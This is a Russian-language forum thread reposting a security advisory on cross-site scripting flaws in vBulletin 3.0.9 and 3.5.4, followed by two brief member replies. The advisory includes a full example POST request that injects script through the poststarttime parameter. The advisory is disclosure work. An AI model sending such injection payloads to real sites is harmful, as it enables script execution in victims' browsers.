Показано с 1 по 3 из 3.

Межсайтовый скриптинг в vBulletin

  1. #1
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для ALEX(XX)
    Регистрация
    31.03.2005
    Адрес
    Чернигов
    Сообщений
    10,777
    Вес репутации
    3731

    Межсайтовый скриптинг в vBulletin

    25 апреля, 2006
    Программа:
    vBulletin 3.0.9, возможно более ранние версии. vBulletin 3.5.4, возможно более ранние версии.

    Опасность: Низкая

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю произвести XSS нападение.

    1. Уязвимость существует из-за недостаточной обработки входных данных в параметрах posthash и poststarttime в сценариях newreply.php и newthread.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Уязвимость обнаружена в версии vBulletin 3.0.9.

    2. Уязвимость существует из-за недостаточной обработки входных данных в параметре posthash в сценарии newthread.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Уязвимость обнаружена в версии vBulletin 3.5.4. Пример:


    POST /forum/newthread.php HTTP/1.0
    Cookie: bbpda=1;
    bbthread_rate=1c6bfc06f109abf5078b2045c33e55a4ax1x-ix1yix5y_;
    bbcalview1=displaymonth; bbcalmonth=4; bbcalyear=2006;
    bbthread_lastview=394ad39f3930b09d1831a211b105b2d6 ax1x-ix1ysx10x%221133126055%22y_;
    bbforum_view=888e1d7caeee8543b71b0312be1553edax2x-ix1yix1144526895yix3yix1144526913y_;
    bbpassword=a7aaf4a00945981be9f73671700f4027; bblastvisit=1144526894;
    bbsessionhash=ba9575585221066d61a0c88baa3fba4c; bbuserid=1
    Content-Length: 312
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
    Host: www.vulnerable.ru
    Content-Type: application/x-www-form-urlencoded
    Referer: http://www.vulnerable.ru/forum/newth...=newthread&f=3

    subject=1234&WYSIWYG_HTML=%3Cp%3E%3C%2Fp%3E&s=&f=3 &do=postthread&posthash=c8
    d3fe38b082b6d3381cbee17f1f1aca&
    poststarttime='%2Balert('Shanker')%2B'&sbutton=%D1 %EE%E7%E4%E0%F2%FC+%ED%EE%
    E2%F3%FE+%F2%E5%EC%F3&parseurl=1&
    disablesmilies=1&emailupdate=3&postpoll=yes&pollop tions=1234&openclose=1&sti
    ckunstick=1&iconid=0

    URL производителя: www.vbulletin.com

    Решение: Способов устранения уязвимости не существует в настоящее время.

    Об уязвимости сообщил Агиевич Игорь aka Shanker ([email protected])

    securitylab.ru
    Left home for a few days and look what happens...

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    VIP Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Палыч
    Регистрация
    19.01.2005
    Сообщений
    696
    Вес репутации
    253
    Ё-моё! У нас как раз v3.5.4....
    Наше дело правое--победа будет за нами!!!

  4. #3
    Geser
    Guest
    Дык опасность низкая. И вообще такие вещи сложно использовать на деле.

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00714 seconds with 19 queries